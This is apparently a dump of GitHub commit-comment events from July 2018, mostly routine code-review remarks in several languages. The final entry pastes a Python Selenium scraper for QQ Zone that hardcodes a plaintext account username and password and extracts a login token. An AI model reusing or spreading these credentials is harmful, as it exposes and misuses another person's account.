{"id":"8042799610","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29900866,"position":24,"line":30,"path":"Lesson3/station.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T09:17:58Z","updated_at":"2018-07-31T09:17:58Z","author_association":"NONE","body":"Этот метод можно убрать, так-как метод :quantuty_trains_by_type(type) выполняет ТЗ"}},"created_at":"2018-07-31T09:17:58Z"}
{"id":"8042800316","type":"CommitCommentEvent","actor":{"login":"ssavinel"},"repo":{"name":"Qwant/WebExtension"},"payload":{"comment":{"id":29900869,"position":null,"line":null,"path":null,"commit_id":"b9dd7454a44571fdbc22f0f33abffa94e26ffb2b","created_at":"2018-07-31T09:18:06Z","updated_at":"2018-07-31T09:18:06Z","author_association":"CONTRIBUTOR","body":"+1"}},"created_at":"2018-07-31T09:18:06Z"}
{"id":"8042804595","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900877,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:18:52Z","updated_at":"2018-07-31T09:18:52Z","author_association":"CONTRIBUTOR","body":"No idea why this was accepted. Unless there is an acceptable response it needs to be reverted."}},"created_at":"2018-07-31T09:18:52Z"}
{"id":"8042804653","type":"CommitCommentEvent","actor":{"login":"zoon81"},"repo":{"name":"zoon81/openBMS"},"payload":{"comment":{"id":29900878,"position":null,"line":null,"path":null,"commit_id":"96b5b5196478ca135ed33a994fa6faaa84cd6901","created_at":"2018-07-31T09:18:53Z","updated_at":"2018-07-31T09:18:53Z","author_association":"OWNER","body":"Why I leaved attiny13A :\r\nOut of flash space\r\nADC can't meansure internal badgap (needed for Vcc determinating)"}},"created_at":"2018-07-31T09:18:53Z"}
{"id":"8042806164","type":"CommitCommentEvent","actor":{"login":"methane"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29900881,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-31T09:19:10Z","updated_at":"2018-07-31T09:19:10Z","author_association":"NONE","body":"Even if you used `Py_TPFLAGS_HAVE_CCALL`, changing PyTypeObject layout will break \"compatibility with extensions built with older Pythons\".  Note that Victor only adds one slot, without changing any existing slots layout.\r\nSo PyTypeObject layout cannot be changed even if it's not part of stable API, while I didn't know why.\r\n\r\nAnyway, this restriction will be removed in 3.8 if GH-4944 is merged."}},"created_at":"2018-07-31T09:19:10Z"}
{"id":"8042806768","type":"CommitCommentEvent","actor":{"login":"ianpartridge"},"repo":{"name":"IBM-Swift/Kitura"},"payload":{"comment":{"id":29900882,"position":13,"line":106,"path":"Tests/KituraTests/TestResponse.swift","commit_id":"8f864b25d4c5d3526a1ee5ae4945181617e82c9b","created_at":"2018-07-31T09:19:16Z","updated_at":"2018-07-31T09:19:16Z","author_association":"MEMBER","body":"This needs to use the same `performServerTest()` and `setupRouter()` machinery as the rest of the router tests.  Have a look at the rest of this file to see how it works."}},"created_at":"2018-07-31T09:19:16Z"}
{"id":"8042808336","type":"CommitCommentEvent","actor":{"login":"ktmn"},"repo":{"name":"WordPress/gutenberg"},"payload":{"comment":{"id":29900885,"position":null,"line":null,"path":null,"commit_id":"70329aa342852c5032bf26023ffb29f551de47c9","created_at":"2018-07-31T09:19:34Z","updated_at":"2018-07-31T09:19:34Z","author_association":"NONE","body":"Shouldn't the width and height be `$color-palette-circle-size + 4px` instead of hard coded 32px?"}},"created_at":"2018-07-31T09:19:34Z"}
{"id":"8042808820","type":"CommitCommentEvent","actor":{"login":"weipengzhen"},"repo":{"name":"weipengzhen/quick_sort"},"payload":{"comment":{"id":29900886,"position":null,"line":null,"path":null,"commit_id":"2898501a2a15f7bdb0e29eada418c3ba99f954df","created_at":"2018-07-31T09:19:39Z","updated_at":"2018-07-31T09:19:39Z","author_association":"OWNER","body":"冒泡排序"}},"created_at":"2018-07-31T09:19:39Z"}
{"id":"8042842089","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900952,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:25:43Z","updated_at":"2018-07-31T09:25:43Z","author_association":"MEMBER","body":"As I said: we already had an automated system in place (from day one), so a second system trying to do the same can most probably not be a good idea."}},"created_at":"2018-07-31T09:25:43Z"}
{"id":"8042844429","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900959,"position":14,"line":14,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:26:10Z","updated_at":"2018-07-31T09:26:10Z","author_association":"NONE","body":"Старайся не использовать айдишки для стилей\r\nДля стиллей - классы\r\nДля скриптов - айдишки"}},"created_at":"2018-07-31T09:26:10Z"}
{"id":"8042845103","type":"CommitCommentEvent","actor":{"login":"mhdanzar"},"repo":{"name":"mhdanzar/Repo1"},"payload":{"comment":{"id":29900961,"position":null,"line":null,"path":null,"commit_id":"62f4bd14ab0a981b3063f29e61caacf585a33d72","created_at":"2018-07-31T09:26:17Z","updated_at":"2018-07-31T09:26:17Z","author_association":"OWNER","body":"anzi4uuuuuuu"}},"created_at":"2018-07-31T09:26:17Z"}
{"id":"8042848040","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900967,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:26:50Z","updated_at":"2018-07-31T09:26:50Z","author_association":"CONTRIBUTOR","body":"Can you please post an example of this negative effect?"}},"created_at":"2018-07-31T09:26:50Z"}
{"id":"8042848661","type":"CommitCommentEvent","actor":{"login":"Gp2mv3"},"repo":{"name":"zo0r/react-native-push-notification"},"payload":{"comment":{"id":29900968,"position":null,"line":null,"path":null,"commit_id":"1c6d7b0e10756c17ac16f51abb0fd6f6803e8770","created_at":"2018-07-31T09:26:57Z","updated_at":"2018-07-31T09:26:57Z","author_association":"COLLABORATOR","body":"It was released some hours ago. :wink: "}},"created_at":"2018-07-31T09:26:57Z"}
{"id":"8042848947","type":"CommitCommentEvent","actor":{"login":"bilelmoussaoui"},"repo":{"name":"flathub/com.github.eudaldgr.elements"},"payload":{"comment":{"id":29900969,"position":null,"line":null,"path":null,"commit_id":"3c108ae220c90c47db760acf1a1c496789520bb4","created_at":"2018-07-31T09:27:00Z","updated_at":"2018-07-31T09:27:00Z","author_association":"COLLABORATOR","body":"Please before you update anything on the master branch, make sure to create a PR and comment `bot, build` to test if the application still builds correctly."}},"created_at":"2018-07-31T09:27:00Z"}
{"id":"8042850232","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900972,"position":717,"line":717,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:27:15Z","updated_at":"2018-07-31T09:27:15Z","author_association":"NONE","body":"`<h2>` - это заголовок\r\nНе надо его использовать не по назначению"}},"created_at":"2018-07-31T09:27:15Z"}
{"id":"8042850462","type":"CommitCommentEvent","actor":{"login":"Kozova1"},"repo":{"name":"Kozova1/Parsec-Integration-With-RetroPie"},"payload":{"comment":{"id":29900973,"position":null,"line":null,"path":null,"commit_id":"b5fcd5ad6f6e4dbcb6741d61d87cd9314c7c7b8f","created_at":"2018-07-31T09:27:18Z","updated_at":"2018-07-31T09:27:18Z","author_association":"OWNER","body":"I will look into integrating this into more themes"}},"created_at":"2018-07-31T09:27:18Z"}
{"id":"8042850539","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900974,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:27:19Z","updated_at":"2018-07-31T09:27:19Z","author_association":"MEMBER","body":"That automated system works for all ViX-repositories, not for other locations. So adding this system to e.g. the OE-A plugins, as has been done, seems to be a good idea (if it works indeed)."}},"created_at":"2018-07-31T09:27:19Z"}
{"id":"8042851355","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29900977,"position":128,"line":null,"path":"app/src/at-thachnguyen/java/asiantech/internship/summer/unit_test/AccountValidationTest.java","commit_id":"7e7a396389b54f5d07b57af5e6ec2731e33728f0","created_at":"2018-07-31T09:27:28Z","updated_at":"2018-07-31T09:27:28Z","author_association":"NONE","body":"WARNING: [AvoidDuplicateLiterals] The String literal \"jddd\" appears 6 times in this file; the first occurrence is on line 128\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/strings.html#AvoidDuplicateLiterals"}},"created_at":"2018-07-31T09:27:28Z"}
{"id":"8042851372","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29900978,"position":142,"line":null,"path":"app/src/at-thachnguyen/java/asiantech/internship/summer/unit_test/AccountValidationTest.java","commit_id":"7e7a396389b54f5d07b57af5e6ec2731e33728f0","created_at":"2018-07-31T09:27:28Z","updated_at":"2018-07-31T09:27:28Z","author_association":"NONE","body":"WARNING: [AvoidDuplicateLiterals] The String literal \"jfHiH35h\" appears 8 times in this file; the first occurrence is on line 142\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/strings.html#AvoidDuplicateLiterals"}},"created_at":"2018-07-31T09:27:28Z"}
{"id":"8042851383","type":"CommitCommentEvent","actor":{"login":"wuziyigood"},"repo":{"name":"wuziyigood/testcase"},"payload":{"comment":{"id":29900979,"position":null,"line":null,"path":null,"commit_id":"151a55a7735f9135952bd1f4c311770bf4bce724","created_at":"2018-07-31T09:27:28Z","updated_at":"2018-07-31T09:27:28Z","author_association":"OWNER","body":"case优化"}},"created_at":"2018-07-31T09:27:28Z"}
{"id":"8042852182","type":"CommitCommentEvent","actor":{"login":"steadfasterX"},"repo":{"name":"steadfasterX/SALT"},"payload":{"comment":{"id":29900981,"position":null,"line":null,"path":null,"commit_id":"6a7a03fc3ab2642fc36ccf1ceb5c7b59eac0b216","created_at":"2018-07-31T09:27:37Z","updated_at":"2018-07-31T09:27:37Z","author_association":"OWNER","body":"closes #12 "}},"created_at":"2018-07-31T09:27:37Z"}
{"id":"8042855190","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900987,"position":726,"line":726,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:28:12Z","updated_at":"2018-07-31T09:28:12Z","author_association":"NONE","body":"Не понятно, что такое `1`.\r\nMagic numbers выноси в константы с адекватным названием"}},"created_at":"2018-07-31T09:28:12Z"}
{"id":"8042855781","type":"CommitCommentEvent","actor":{"login":"zupo"},"repo":{"name":"niteoweb/handbook"},"payload":{"comment":{"id":29900988,"position":10,"line":9,"path":"people/benefits.md","commit_id":"46678ef62766164ac27d1db546381fabb077a00d","created_at":"2018-07-31T09:28:18Z","updated_at":"2018-07-31T09:28:18Z","author_association":"MEMBER","body":"I prefer splitting into multiple documents.\r\n\r\nSemco has a rule that a document needs to fit on one A4 paper. If we need TOC, the document is prolly too long."}},"created_at":"2018-07-31T09:28:18Z"}
{"id":"8042859100","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29900993,"position":null,"line":null,"path":null,"commit_id":"a06d36576cdc3b65bf5aa61b4fdc7d4685b9fe0d","created_at":"2018-07-31T09:28:53Z","updated_at":"2018-07-31T09:28:53Z","author_association":"COLLABORATOR","body":"Wchodziłem z linka zgłaszającego i tak się zakładka ostała...\r\n\r\n...ale jak coś odblokowywanie przewijania jest denerwujące samym CSS, nie wiem czemu nagle po czasie zaskoczyło.\r\n\r\nJuż chciałem kombinować z jakimś \"`!#if  !cap_user_stylesheet`\" i na jakimikolwiek elemencie odblokować dla Chrome / Opery - Firefox olewał reguły jak dodałem sobie ręcznie jeżeli."}},"created_at":"2018-07-31T09:28:53Z"}
{"id":"8042862454","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29900996,"position":26,"line":34,"path":"Lesson3/train.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T09:29:30Z","updated_at":"2018-07-31T09:29:30Z","author_association":"NONE","body":"Название немного сбивает с толку. Думаю find_station было бы более конвеницонально, исходя из имплементации"}},"created_at":"2018-07-31T09:29:30Z"}
{"id":"8042862668","type":"CommitCommentEvent","actor":{"login":"LopkyTonk"},"repo":{"name":"LopkyTonk/ProjectToLearn"},"payload":{"comment":{"id":29900997,"position":null,"line":null,"path":null,"commit_id":"03ff65d885da833448dc0cb97f5e9482055c2c7d","created_at":"2018-07-31T09:29:32Z","updated_at":"2018-07-31T09:29:32Z","author_association":"OWNER","body":"Mistake"}},"created_at":"2018-07-31T09:29:32Z"}
{"id":"8042863187","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900998,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:29:38Z","updated_at":"2018-07-31T09:29:38Z","author_association":"CONTRIBUTOR","body":"OE-A plugins updates the po files too."}},"created_at":"2018-07-31T09:29:38Z"}
{"id":"8042864880","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901004,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:29:57Z","updated_at":"2018-07-31T09:29:57Z","author_association":"MEMBER","body":"One negative effect I can see is two systems doing the same thing; best case that is redundant code, worst case one will hamper the other.\r\nAnd at least it doesn't do anything useful (for ViX), so that's the first reason to delete that code."}},"created_at":"2018-07-31T09:29:57Z"}
{"id":"8042864932","type":"CommitCommentEvent","actor":{"login":"BKhatnaa"},"repo":{"name":"BKhatnaa/santi"},"payload":{"comment":{"id":29901005,"position":null,"line":null,"path":null,"commit_id":"602ded2a8186ca5c59334467091766efec5c5941","created_at":"2018-07-31T09:29:57Z","updated_at":"2018-07-31T09:29:57Z","author_association":"OWNER","body":"keras-retinanet"}},"created_at":"2018-07-31T09:29:57Z"}
{"id":"8042867849","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901012,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:30:27Z","updated_at":"2018-07-31T09:30:27Z","author_association":"CONTRIBUTOR","body":"For fucks sake, stop being so insular."}},"created_at":"2018-07-31T09:30:27Z"}
{"id":"8042873182","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29901019,"position":14,"line":168,"path":"bundles/AdminBundle/Controller/Admin/IndexController.php","commit_id":"5230c341cade43eca24226b221ca7a871f0013eb","created_at":"2018-07-31T09:31:26Z","updated_at":"2018-07-31T09:31:26Z","author_association":"MEMBER","body":"hasParameter does not exist"}},"created_at":"2018-07-31T09:31:26Z"}
{"id":"8042874068","type":"CommitCommentEvent","actor":{"login":"ecthiender"},"repo":{"name":"frasertweedale/hs-jose"},"payload":{"comment":{"id":29901022,"position":null,"line":null,"path":null,"commit_id":"59ca5e656370e5b7812faadf5234aa9b0724e782","created_at":"2018-07-31T09:31:35Z","updated_at":"2018-07-31T09:31:35Z","author_association":"NONE","body":"Sorry for the late reply. The github notification system is a mess. Yeah if the function anyway gives false positives (or just works with assuming only one algo), then it doesn't really solve the use-case, right?\r\n\r\nI'll try to think about a better API for this?"}},"created_at":"2018-07-31T09:31:35Z"}
{"id":"8042874079","type":"CommitCommentEvent","actor":{"login":"katrinleinweber"},"repo":{"name":"swcarpentry/website"},"payload":{"comment":{"id":29901023,"position":null,"line":null,"path":null,"commit_id":"2b51a64239b14d56114a537bc6e0e41b4dfe0224","created_at":"2018-07-31T09:31:35Z","updated_at":"2018-07-31T09:31:35Z","author_association":"CONTRIBUTOR","body":"Thank you so much :-)"}},"created_at":"2018-07-31T09:31:35Z"}
{"id":"8042874553","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29901024,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-31T09:31:41Z","updated_at":"2018-07-31T09:31:41Z","author_association":"COLLABORATOR","body":"I read the man page after posting this comment. You are right about this."}},"created_at":"2018-07-31T09:31:41Z"}
{"id":"8042875547","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901028,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-31T09:31:52Z","updated_at":"2018-07-31T09:31:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:31:52Z"}
{"id":"8042876881","type":"CommitCommentEvent","actor":{"login":"sukchai19933"},"repo":{"name":"bitcoin-wallet/bitcoin-wallet"},"payload":{"comment":{"id":29901032,"position":null,"line":null,"path":null,"commit_id":"e3ebf7ad9e947be6b35151475028871176de3e3d","created_at":"2018-07-31T09:32:05Z","updated_at":"2018-07-31T09:32:05Z","author_association":"NONE","body":"bitcoin wallle 13oPwBdsbej2ctfbA4d9fZks1o21XQvKXg"}},"created_at":"2018-07-31T09:32:05Z"}
{"id":"8042877169","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901035,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:32:09Z","updated_at":"2018-07-31T09:32:09Z","author_association":"CONTRIBUTOR","body":"Please explain the benefit, and why the current way is no good.\r\n"}},"created_at":"2018-07-31T09:32:09Z"}
{"id":"8042878114","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29901037,"position":14,"line":168,"path":"bundles/AdminBundle/Controller/Admin/IndexController.php","commit_id":"5230c341cade43eca24226b221ca7a871f0013eb","created_at":"2018-07-31T09:32:18Z","updated_at":"2018-07-31T09:32:18Z","author_association":"MEMBER","body":"`$this->container->hasParameter()`"}},"created_at":"2018-07-31T09:32:18Z"}
{"id":"8042881115","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901042,"position":656,"line":656,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:32:50Z","updated_at":"2018-07-31T09:32:50Z","author_association":"NONE","body":"Не используй айдишки для стилей, но если уж решил использовать - называй так, чтоб было понятно.\r\nУ тебя тут айдишка `review` и снизу вложеный `div` с таким же классом\r\nНе понятно"}},"created_at":"2018-07-31T09:32:50Z"}
{"id":"8042882949","type":"CommitCommentEvent","actor":{"login":"DarrenJay"},"repo":{"name":"DarrenJay/hello-world"},"payload":{"comment":{"id":29901046,"position":null,"line":null,"path":null,"commit_id":"242375536754e5c2e15d8d7078d61a5b17492ab0","created_at":"2018-07-31T09:33:11Z","updated_at":"2018-07-31T09:33:11Z","author_association":"OWNER","body":"👍 "}},"created_at":"2018-07-31T09:33:11Z"}
{"id":"8042885367","type":"CommitCommentEvent","actor":{"login":"DarrenJay"},"repo":{"name":"DarrenJay/hello-world"},"payload":{"comment":{"id":29901049,"position":null,"line":null,"path":null,"commit_id":"242375536754e5c2e15d8d7078d61a5b17492ab0","created_at":"2018-07-31T09:33:37Z","updated_at":"2018-07-31T09:33:37Z","author_association":"OWNER","body":":)"}},"created_at":"2018-07-31T09:33:37Z"}
{"id":"8042887643","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29901054,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-31T09:34:03Z","updated_at":"2018-07-31T09:34:03Z","author_association":"COLLABORATOR","body":"Earlier, I always just *assumed* how it worked. It is named quite misleadingly and seems to be wrongly sold as a quick \"safer\" replacement for regular `strcpy`."}},"created_at":"2018-07-31T09:34:03Z"}
{"id":"8042887644","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901055,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:34:03Z","updated_at":"2018-07-31T09:34:03Z","author_association":"MEMBER","body":"> For fucks sake, stop being so insular.\r\n\r\nI have no idea what you're trying to say and to whom you're trying to say it, but this doesn't seem to be fine English to me.\r\nCorrect me if I'm wrong please."}},"created_at":"2018-07-31T09:34:03Z"}
{"id":"8042895077","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901072,"position":729,"line":729,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:35:24Z","updated_at":"2018-07-31T09:35:24Z","author_association":"NONE","body":"Картинки тоже старайся называть чтоб было понятно"}},"created_at":"2018-07-31T09:35:24Z"}
{"id":"8042896532","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901074,"position":733,"line":733,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:35:40Z","updated_at":"2018-07-31T09:35:40Z","author_association":"NONE","body":"Лишние переносы строк"}},"created_at":"2018-07-31T09:35:40Z"}
{"id":"8042898720","type":"CommitCommentEvent","actor":{"login":"freed00m"},"repo":{"name":"LukeSmithxyz/voidrice"},"payload":{"comment":{"id":29901078,"position":null,"line":null,"path":null,"commit_id":"112244afc8e70a96bb034d6077a13d0cb621cdd7","created_at":"2018-07-31T09:36:04Z","updated_at":"2018-07-31T09:36:04Z","author_association":"CONTRIBUTOR","body":"I also starring on the file and ask myself, what is the point?? :D"}},"created_at":"2018-07-31T09:36:04Z"}
{"id":"8042899830","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901079,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:36:16Z","updated_at":"2018-07-31T09:36:16Z","author_association":"CONTRIBUTOR","body":"What harm is there in an additional method to generate the po files to assist translators? It complements, not replaced.\r\n\r\nIs objection to this commit because of dislike for pr2. I.e argument over media player changes"}},"created_at":"2018-07-31T09:36:16Z"}
{"id":"8042900112","type":"CommitCommentEvent","actor":{"login":"davy42"},"repo":{"name":"DaoCasino/Protocol"},"payload":{"comment":{"id":29901080,"position":null,"line":null,"path":null,"commit_id":"f5ab7353f626f9c08c1d6ef2584d63e9e8054572","created_at":"2018-07-31T09:36:20Z","updated_at":"2018-07-31T09:36:20Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Operator Instance](https://trello.com/c/IffU8t2V/8-operator-instance)"}},"created_at":"2018-07-31T09:36:20Z"}
{"id":"8042902133","type":"CommitCommentEvent","actor":{"login":"Uter0"},"repo":{"name":"Uter0/hello-whale"},"payload":{"comment":{"id":29901082,"position":3,"line":3,"path":"README.md","commit_id":"900e44a9fef9be225cd3f46959d0921d237c760c","created_at":"2018-07-31T09:36:43Z","updated_at":"2018-07-31T09:36:43Z","author_association":"OWNER","body":"\r\n#Just another speck\r\n\r\n\r\n"}},"created_at":"2018-07-31T09:36:43Z"}
{"id":"8042902650","type":"CommitCommentEvent","actor":{"login":"Uter0"},"repo":{"name":"Uter0/hello-whale"},"payload":{"comment":{"id":29901083,"position":null,"line":null,"path":null,"commit_id":"900e44a9fef9be225cd3f46959d0921d237c760c","created_at":"2018-07-31T09:36:49Z","updated_at":"2018-07-31T09:36:49Z","author_association":"OWNER","body":"Hello world"}},"created_at":"2018-07-31T09:36:49Z"}
{"id":"8042908291","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901092,"position":739,"line":739,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:37:54Z","updated_at":"2018-07-31T09:37:54Z","author_association":"NONE","body":"Такие сокращения абсолютно не читабельны\r\nЕсли уж писать такое, то тут должно было бы быть вот так:\r\n```\r\nslideIndex = n;\r\nshowDivs(slideIndex);\r\n```"}},"created_at":"2018-07-31T09:37:54Z"}
{"id":"8042908307","type":"CommitCommentEvent","actor":{"login":"Superjomn"},"repo":{"name":"PaddlePaddle/Paddle"},"payload":{"comment":{"id":29901093,"position":15,"line":55,"path":"paddle/fluid/inference/api/api_anakin_engine_tester.cc","commit_id":"d255ac531fac51f1a26578de291bc7ef2bb1db4c","created_at":"2018-07-31T09:37:54Z","updated_at":"2018-07-31T09:37:54Z","author_association":"CONTRIBUTOR","body":"code 有 format？"}},"created_at":"2018-07-31T09:37:54Z"}
{"id":"8042911316","type":"CommitCommentEvent","actor":{"login":"join-Q"},"repo":{"name":"join-Q/web-crawler-QQkongjian"},"payload":{"comment":{"id":29901096,"position":null,"line":null,"path":null,"commit_id":"171f6a40a0ce810c4b0acc6b0281b3151e14593c","created_at":"2018-07-31T09:38:29Z","updated_at":"2018-07-31T09:38:29Z","author_association":"OWNER","body":"from selenium import webdriver\r\nimport requests\r\nimport time\r\nfrom urllib import parse\r\nimport re\r\nimport redis\r\nimport json\r\nimport sys\r\n\r\n\r\nclass Spider(object):\r\n    def __init__(self):\r\n        self.web = webdriver.Chrome()\r\n        self.web.get('https://user.qzone.qq.com')\r\n        self.pos=80\r\n        self.__username = '3185539845'\r\n        self.__password = '.xph7605'\r\n        self.headers = {\r\n            'host': 'h5.qzone.qq.com',\r\n            'accept-encoding': 'gzip, deflate, br',\r\n            'accept-language': 'zh-CN,zh;q=0.8',\r\n            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\r\n            'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',\r\n            'connection': 'keep-alive'\r\n        }\r\n        self.headers2 = {\r\n            'host': 'h5.qzone.qq.com',\r\n            'accept-encoding': 'gzip, deflate, br',\r\n            'accept-language': 'zh-CN,zh;q=0.8',\r\n            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\r\n            'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',\r\n            'connection': 'keep-alive'\r\n        }\r\n        self.req = requests.Session()\r\n        self.cookies = {}\r\n        self.qzonetoken = \"\"\r\n  #      self.re = connect_redis()\r\n        self.content = []\r\n        self.unikeys = []\r\n        self.like_list_names = []\r\n        self.tid = \"\"\r\n        self.mood_details = []\r\n        self.page_list=[]\r\n        self.firstunikey=[]\r\n        self.secondunikey=[]\r\n\r\n    # 模拟登陆， 需要selenium\r\n    def login(self):\r\n        self.web.switch_to_frame('login_frame')\r\n        log = self.web.find_element_by_id(\"switcher_plogin\")\r\n        log.click()\r\n        time.sleep(1)\r\n        username = self.web.find_element_by_id('u')\r\n        username.send_keys(self.__username)\r\n        ps = self.web.find_element_by_id('p')\r\n        ps.send_keys(self.__password)\r\n        btn = self.web.find_element_by_id('login_button')\r\n        time.sleep(5)\r\n        btn.click()\r\n        time.sleep(5)\r\n        html = self.web.page_source\r\n        g_qzonetoken=re.search('window\\.g_qzonetoken = \\(function\\(\\)\\{ try\\{return (.*?);\\} catch\\(e\\)',html)#从网页源码中提取g_qzonetoken\r\n        self.qzonetoken = str(g_qzonetoken[0]).split('\\\"')[1]\r\n        